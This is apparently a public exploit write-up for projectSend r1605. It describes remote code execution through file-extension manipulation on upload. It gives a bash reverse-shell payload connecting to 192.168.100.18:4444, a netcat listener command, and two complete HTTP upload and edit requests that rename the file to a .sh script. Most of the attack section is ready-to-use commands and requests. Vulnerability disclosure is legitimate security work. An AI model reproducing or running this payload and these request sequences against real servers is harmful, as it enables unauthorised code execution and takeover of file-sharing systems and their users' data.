Exploit Title: projectSend r1605 - Remote Code Exectution RCE Application: projectSend Version: r1605 Bugs: rce via file extension manipulation Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 26-01-2023 Author: Mirabbas Ağalarov Tested on: Linux POC video: https://youtu.be/Ln7KluDfnk4 2. Technical Details & POC ======================================== 1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. bash -i >& /dev/tcp/192.168.100.18/4444 0>&1 2.Then the attacker starts listening for ip and port nc -lvp 4444 3.and when uploading file it makes http request as below.file name should be like this openme.sh;jpg POST /includes/upload.process.php HTTP/1.1 Host: localhost Content-Length: 525 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-platform: "Linux" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/upload.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59 Connection: close ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="name" openme.sh;jpg ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="chunk" 0 ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="chunks" 1 ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="file"; filename="blob" Content-Type: application/octet-stream bash -i >& /dev/tcp/192.168.100.18/4444 0>&1 ------WebKitFormBoundary0enbZuQQAtahFVjI-- 4.In the second request, we do this to the filename section at the bottom. openme.sh POST /files-edit.php?ids=34 HTTP/1.1 Host: localhost Content-Length: 1016 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/files-edit.php?ids=34&type=new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59 Connection: close ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="csrf_token" 66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02 ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][id]" 34 ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][original]" openme.sh;.jpg ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][file]" 1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][name]" openme.sh ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][description]" ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][expiry_date]" 25-02-2023 ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="save" ------WebKitFormBoundaryc8btjvyb3An7HcmA-- And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce private youtube video poc : https://youtu.be/Ln7KluDfnk4